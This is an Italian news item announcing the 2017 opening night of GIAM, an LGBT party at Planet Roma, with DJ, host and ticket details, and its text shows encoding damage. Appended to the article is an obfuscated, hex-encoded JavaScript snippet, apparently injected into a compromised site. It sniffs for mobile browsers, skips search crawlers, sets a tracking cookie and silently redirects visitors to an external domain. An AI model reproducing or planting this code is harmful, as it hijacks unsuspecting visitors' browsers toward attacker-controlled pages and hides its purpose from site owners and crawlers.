News

La ventesima edizione di GIAM parte sabato 14 ottobre al Planet di Roma

Il party a tinte rainbow piA? noto della Capitale, apre le porte alla nuova stagione invernale. Sabato 14 Ottobre 2017 dalle ore 23.30 avrA� inizio la nuova stagione di GIAM, il party LGBT che da metA� ottobre al Planet Roma, darA� il via alla sua ventesima edizione con un big opening party che promette divertimento, sotto la direzione artistica di Ezio Cristo supervisionato da Annachiara Marignoli, che con Mauro Basso sono i fondatori del marchio GIAM.

Al grido dirompente di WelComeBack: Bentornato Futuro, sono racchiuse le diverse personalitA� musicali del party, sotto una��unica forma, proprio attraverso la��affermazione di una��identitA� arcobaleno che ogni sabato si districherA� nelle sale polivalenti del Planet. Un party completamente rinnovato, in ogni sua forma. Dal logo, allo staff, alla distribuzione delle sale, alla��allestimento.

Il cambio grafico, realizzato da Giuseppe Costantino, si percepisce sin da subito in maniera forte giA� dal logo, che A? stato completamente stravolto dando valore non solo al nome, ma soprattutto alla��elemento centrale: un fulmine, ispirato a una delle immagini piA? iconografiche del panorama musicale mondiale. La famosa copertina Alladin Sane, disco di David Bowie uscito nel 1973, dove compare la��artista con una saetta che divide la sua faccia in due, per sottolineare la personalitA� eclettica del cantante. Icona Gay e primo vero trasformista della cultura pop.

Le novitA� riguardano anche la struttura, con una Planet Roma completamente rinnovato, una tecnica da��avanguardia mai avuta prima. Sale e DJ set differenti accontenteranno un pubblico poliedrico.

Una nuovissima sala house che tende a imporsi in maniera dura nel clubbing gay e che ospiterA� una guest internazionale: Steven Redant, DJ spagnolo residente nei party LGBT piA? importanti del mondo, vanta una delle prime posizioni nella classifica dei brani piA? scaricati al mondo su soundcloud, per il suo remix ufficiale di Swish Swish di Katy Perry.

Master of Ceremonies per questa data da��apertura direttamente da Ibiza, il volto e la voce piA? riconosciuta al mondo: BabyMarcelo, personaggio storico della nightlife ibizenca, reduce dalla stagione estiva della Troya di Ibiza sulla��Isola Bonita, si catapulterA� nella capitale per colorare e movimentare il party.

A riscaldare la pista in sala house, David Leroy, punta di diamante di casa GIAM nonchA� residenti della��Xlsior, festival gay con residenza a Mykonos.

Si riconferma una sala pop molto importante. Per la��apertura un’ouverture di DJ che saranno i padroni di casa in questa stagione. Atrim, Charlsgold, Enrico Palazzo, Dorin T e Simone Farag. Questa��ultimo assieme a Daniele Franzon movimenteranno anche la sala Happy con una musica revival. Sul main stage la��animazione capitanata da Kristine Vontrois e Paola Penelope nuova voce ufficiale di questa stagione. Assieme a loro sul palco anche le drag anche Silvana Della Magliana e Shemale che balleranno e perforeranno accompagnate dal corpo di ballo di altissimo livello, provenienti dai programmi televisivi piA? visti, coreografati da Andrea Attila. A curare il timing, tutta la parte tecnica e la di direzione di palco, Salvo De Rosa, colonna portante della struttura, coadiuvato da Carlo Santino responsabile del personale.A� In occasione della��apertura sarA� presentata anche la nuova sigla a�?Our Pridea�? realizzata da Nero Studio con la regia di Valerio Amer, cantata live da Andrea Riccardi che assieme a Giusva animeranno anche il resto della serata con le loro voci.A� Non meno importante questa��anno sarA� anche la Girlie Room che, ogni settimana accoglierA� in consolle dj donne provenienti da tutto lo stivale, per questo spazio esclusivo e dedicato a un pubblico solamente femminile. A inaugurare la sala Missy J Light, direttamente dal Padova Pride Village.

Area importantissima del locale questa��anno, A? anche il Belvedere PrivA?, che ritorna in un punto speciale del Planet Roma, e che per la sua posizione riserverA� ai clienti esclusivi, spettacoli e animazione ad hoc. A dirigere il privA? due punti di riferimento fondamentali per la movida gay romana Davide Bartocci e Giulia Francescon che vengono riconfermati per la terza stagione.

A? affidata invece al noto PR romano Alfonso Stani, la supervisione della��area in cui accoglierA� e intratterrA� in maniera eccellente tutti i suoi amici VIP che verranno a trovarlo durante il corso della stagione.A�

Un cambio radiale anche nel prezzo, che ci piace definire politico:10 euro con drink in lista e 15 euro con drink fuori lista, per rendere accessibile la serata anche ai piA? giovani, agli studenti e a chi in un momento come questo non puA? piA? permettersi troppi svaghi.

Sabato 14 Ottobre

Dalle 23.30 alle 05.30

Planet Roma

via del Commercio, 36 – Roma

Ingresso euro 15 con drink

Infoline 3922501124

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}